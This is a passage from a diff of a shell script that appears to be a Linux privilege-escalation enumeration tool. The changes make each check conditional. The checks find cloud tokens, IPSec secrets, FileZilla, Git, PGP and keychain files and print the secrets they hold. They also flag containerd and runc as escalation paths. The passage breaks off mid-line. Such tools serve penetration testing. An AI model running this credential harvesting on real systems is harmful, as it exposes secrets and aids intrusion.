"$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "azureProfile\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,azureProfile\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"TokenCache\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "TokenCache.dat"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "TokenCache\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,TokenCache\.dat$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"AzureRMContext\.json$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AzureRMContext.json"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "AzureRMContext\.json$" | while read f; do ls -ld "$f" | sed -${E} "s,AzureRMContext\.json$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CLOUD_CREDENTIALS\" | grep -E \"\.bluemix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bluemix"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_CREDENTIALS" | grep -E "\.bluemix$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bluemix$,${SED_RED},"; find "$f" -name "config.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Cloud Init Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then echo_not_found "cloud.cfg"; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cloud Init Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing CloudFlare Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then echo_not_found ".cloudflared"; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; +if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing CloudFlare Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi - print_2title "Analyzing Erlang Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then echo_not_found ".erlang.cookie"; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Erlang Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing GMV Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then echo_not_found "gvm-tools.conf"; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then + print_2title "Analyzing GMV Auth Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing IPSec Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then echo_not_found "ipsec.secrets"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then echo_not_found "ipsec.conf"; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then + print_2title "Analyzing IPSec Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing IRSSI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then echo_not_found ".irssi"; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; for ff in $(find "$f" -name "config"); do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing IRSSI Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; +fi - print_2title "Analyzing Keyring Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then echo_not_found "keyrings"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then echo_not_found "*.keyring"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then echo_not_found "*.keystore"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then echo_not_found "*.jks"; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Keyring Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Filezilla Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then echo_not_found "filezilla"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; for ff in $(find "$f" -name "sitemanager.xml"); do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then echo_not_found "filezilla.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Filezilla Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Backup Manager Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then echo_not_found "storage.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then echo_not_found "database.php"; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Backup Manager Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; +fi - ##-- SI) passwd files (splunk) +##-- SI) passwd files (splunk) +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then print_2title "Searching uncommon passwd files (splunk)" - SPLUNK_BIN="$(command -v splunk 2>/dev/null)" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then @@ -2790,16 +3056,20 @@ if echo $CHECKS | grep -q SofI; then fi done echo "" +fi +if [ "$PSTORAGE_KCPASSWORD" ] || [ "$DEBUG" ]; then print_2title "Analyzing kcpassword files" print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" - printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + printf "%s\n" "$PSTORAGE_KCPASSWORD" | while read f; do echo "$f" | sed -${E} "s,.*,${SED_RED}," base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," done echo "" +fi - ##-- SI) Gitlab +##-- SI) Gitlab +if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then print_2title "Searching GitLab related files" #Check gitlab-rails if [ "$(command -v gitlab-rails)" ]; then @@ -2829,56 +3099,72 @@ if echo $CHECKS | grep -q SofI; then echo "" done echo "" +fi - print_2title "Analyzing Github Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then echo_not_found ".github"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then echo_not_found ".gitconfig"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then echo_not_found ".git-credentials"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then echo_not_found ".git"; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_GITHUB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Github Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.github$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".github"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.github$" | while read f; do ls -ld "$f" | sed -${E} "s,\.github$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.gitconfig$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".gitconfig"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.gitconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gitconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git-credentials$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_GITHUB\" | grep -E \"\.git$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git"; fi; fi; printf "%s" "$PSTORAGE_GITHUB" | grep -E "\.git$" | while read f; do ls -ld "$f" | sed -${E} "s,\.git$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Svn Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then echo_not_found ".svn"; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; +if [ "$PSTORAGE_SVN" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Svn Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SVN\" | grep -E \"\.svn$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".svn"; fi; fi; printf "%s" "$PSTORAGE_SVN" | grep -E "\.svn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.svn$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi - print_2title "Analyzing PGP-GPG Files (limit 70)" +if [ "$PSTORAGE_PGP_GPG" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PGP-GPG Files (limit 70)" ( (command -v gpg && gpg --list-keys) || echo_not_found "gpg") 2>/dev/null ( (command -v netpgpkeys && netpgpkeys --list-keys) || echo_not_found "netpgpkeys") 2>/dev/null (command -v netpgp || echo_not_found "netpgp") 2>/dev/null - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then echo_not_found "*.pgp"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then echo_not_found "*.gpg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then echo_not_found "*.gnupg"; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.pgp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pgp"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.pgp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pgp$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; +fi - print_2title "Analyzing Cache Vi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then echo_not_found "*.swp"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then echo_not_found "*.viminfo"; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; +if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cache Vi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; +fi - print_2title "Analyzing Wget Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then echo_not_found ".wgetrc"; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_WGET" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Wget Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WGET\" | grep -E \"\.wgetrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".wgetrc"; fi; fi; printf "%s" "$PSTORAGE_WGET" | grep -E "\.wgetrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.wgetrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi - ##-- SI) containerd installed +##-- SI) containerd installed +containerd=$(command -v ctr) +if [ "$containerd" ] || [ "$DEBUG" ]; then print_2title "Checking if containerd(ctr) is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" - containerd=$(command -v ctr) if [ "$containerd" ]; then echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," ctr image list fi echo "" +fi - ##-- SI) runc installed +##-- SI) runc installed +runc=$(command -v runc) +if [ "$runc" ] || [ "$DEBUG" ]; then print_2title "Checking if runc is available" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" - runc=$(command -v runc) if [ "$runc" ]; then echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," fi echo "" +fi - #-- SI) Docker +#-- SI) Docker +if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then print_2title "Searching docker files (limit 70)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do @@ -2888,414 +3174,526 @@ if echo $CHECKS | grep -q SofI; then fi done echo "" +fi - print_2title "Analyzing Firefox Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then echo_not_found ".mozilla"; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then echo_not_found "Firefox"; fi; printf "%s" 